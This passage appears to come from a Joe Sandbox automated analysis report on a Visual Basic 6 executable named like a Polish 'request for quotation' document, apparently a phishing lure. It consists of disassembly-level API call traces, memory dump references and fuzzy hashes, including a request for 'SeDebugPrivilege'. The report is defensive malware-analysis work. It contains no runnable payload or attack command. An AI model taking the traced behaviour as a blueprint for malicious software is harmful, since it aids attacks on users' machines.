                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: 392004513970ef635da4a611ab646abaa928053d5d8163be545aabfb3d7528fd
                                                                                                                                                                                                                                                      • Instruction ID: b391c340adbf3e59c3df7a7246d9472bd0b0b55e754b724d87d5f09335da3bbb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 392004513970ef635da4a611ab646abaa928053d5d8163be545aabfb3d7528fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E310DB5A00118DBDB14DBA4ED84DEE7779EF88300F50856AE506A3261DF34A986CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                                                                                                                                                                                      • #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                                                                                                                                                                                      • #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                                                                                                                                                                                      • #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0041F2B8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$ErrorMove$#537$#606#616AnsiChkstkOverflowSystemUnicode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1093449089-0
                                                                                                                                                                                                                                                      • Opcode ID: ee02f3b2826ffa236948fc2c1f65590c4aa55ef8d50380a296c512f1be7178e6
                                                                                                                                                                                                                                                      • Instruction ID: 0e4e532b7f79ceded0d12069193019f5775f2f1d5aa758d8f51e06bfe5b2f4ca
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee02f3b2826ffa236948fc2c1f65590c4aa55ef8d50380a296c512f1be7178e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20311C75900149EFDB04DFA4DA4CBDEBBB8FF08305F108169E502B62A0DB755A05CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,0041A500,?,?,?,00000000,Function_000032B6), ref: 0041A2CE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A2FE
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A313
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000028,?,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A32B
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 0041A37B
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 0041A39A
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041A3AB
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041A3C3
                                                                                                                                                                                                                                                      • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 0041A420
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 0041A475
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                      • API String ID: 1749655604-2896544425
                                                                                                                                                                                                                                                      • Opcode ID: a09d8b27c4e060d415cd38d35f886b830d8e55dcf0cb0396c666bdd4df63c9ca
                                                                                                                                                                                                                                                      • Instruction ID: 4de2d3f6ed40af32cba968f736910ab2351f3027917a15dd84bedccea81ef083
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a09d8b27c4e060d415cd38d35f886b830d8e55dcf0cb0396c666bdd4df63c9ca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0514B70901308DBEB10DFA1DA49BEEBBB8FB04704F20816EE105AB291D7B84A45DF56
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3031735744-0
                                                                                                                                                                                                                                                      • Opcode ID: ec505b9da935685f743cf272e17281aba0119273a56e583c7af6864e293ea477
                                                                                                                                                                                                                                                      • Instruction ID: 5fd8a786a428ecf44f1591115f944ef2e4a492f21aad71c04980f5145bc2ad87
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec505b9da935685f743cf272e17281aba0119273a56e583c7af6864e293ea477
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B731DBB1900209EFCB04EFE4DE49FDE7BB8BB48705F108259F612B65A0D7745A48CB65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CBB8,80000002,00000000,00000000), ref: 00429E2E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E5B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E67
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00429E76
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429E8F
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00429E9F
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EAD
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EB6
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429ECB
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429EDB
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EE9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EF2
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429F08
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00429F32,?,?,?,00000000,004032B6), ref: 00429F22
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429F2B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3031735744-0
                                                                                                                                                                                                                                                      • Opcode ID: 8dba7990584796c2d513886add396c5f5192d76287c72b2b2e7eaf5777dcc1de
                                                                                                                                                                                                                                                      • Instruction ID: ef05815d91a7badc13ce189a5e2ee1fd6bd11c379c37ab60153baacb3b4262a3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dba7990584796c2d513886add396c5f5192d76287c72b2b2e7eaf5777dcc1de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5231CBB5910149EFCB04EFE4DE48EDEBBB8FB48715F108269F502B61A0DB745A44CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,0041B687,0042C0E8,?), ref: 0041599E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,00000000,6CF8D8B1,6CF8DF85,?,Function_000032B6), ref: 004159CE
                                                                                                                                                                                                                                                      • #580.MSVBVM60(?,00000000), ref: 004159E3
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00415A02
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00415A0F
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000020,000000FF,?), ref: 00415A2B
                                                                                                                                                                                                                                                      • #570.MSVBVM60(?,?), ref: 00415A42
                                                                                                                                                                                                                                                      • __vbaPut4.MSVBVM60(00000000,00000000,-00000001), ref: 00415A58
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00415A6D
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000000,?,?), ref: 00415A7E
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00415A87
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(?), ref: 00415A99
                                                                                                                                                                                                                                                      • #580.MSVBVM60(?,00000027), ref: 00415AAE
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 00415AE2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$#580ErrorFileFree$#570#648ChkstkCloseCopyOpenOverflowPut3Put4
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 633625294-0
                                                                                                                                                                                                                                                      • Opcode ID: c184e6fed43095bbc808ed6dabd80215540fbf370ef609e54faf454b01daf8be
                                                                                                                                                                                                                                                      • Instruction ID: 077cd5495f4d2610dc4ebb710a7c1806296cb1f910c24ca7336927bb814984b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c184e6fed43095bbc808ed6dabd80215540fbf370ef609e54faf454b01daf8be
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE311AB5900208EFEB04DF94DA48BDEBBB8FF48715F108259F501BB6A0D7795A84CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,?,0040DFD2,?,?,?,Function_000032B6), ref: 00419B2E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 00419B5E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 00419B79
                                                                                                                                                                                                                                                      • #525.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419B83
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 00419B8E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419BA9
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00419BC4
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,?,Function_000032B6), ref: 00419BD6
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00419BE4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419BED
                                                                                                                                                                                                                                                      • #519.MSVBVM60(?,?,?,?,?,?,?,Function_000032B6), ref: 00419BFE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419C09
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00419C3D,?,?,?,?,?,?,Function_000032B6), ref: 00419C36
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419C53
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$System$FreeMove$#519#525AnsiChkstkOverflowUnicode
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3463755217-0
                                                                                                                                                                                                                                                      • Opcode ID: b493d4c5f5f54a827ca7640190fff222c55f1d558614f84cc34330e3b91e4b31
                                                                                                                                                                                                                                                      • Instruction ID: 59ab86815b635178f25ac20134c8c30b5a73cca353c440905f8b97c0bcbdadc5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b493d4c5f5f54a827ca7640190fff222c55f1d558614f84cc34330e3b91e4b31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331CE75900248EFCB04EFA4DA48BDE7BB4FB48305F108669F501B7260DB799A44CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,6CF84F32,00000000,00000FEE), ref: 0042134B
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000), ref: 00421365
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421386
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00421395
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,?), ref: 004213A2
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004213BD
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 004213C6
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004213E9
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004213F9
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004213FF
                                                                                                                                                                                                                                                      • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00421412
                                                                                                                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0042143F,6CF84F32,00000000,00000FEE,?,?,?,?,?,?,?,?,?,7FFFFFFF), ref: 00421438
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(00000000,6CF84F32,00000000,00000FEE,?,?,?,?,?,?,?,?,?,7FFFFFFF,Function_000032B6), ref: 00421450
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3281955820-0
                                                                                                                                                                                                                                                      • Opcode ID: 47b01bcdffa297faf139a01935df7f97165424e177e24eb6e474878f494e6cb8
                                                                                                                                                                                                                                                      • Instruction ID: d3bc4d229a8ccd66a9bed061019a776db086e1d909af8dc46df260a90b41282b
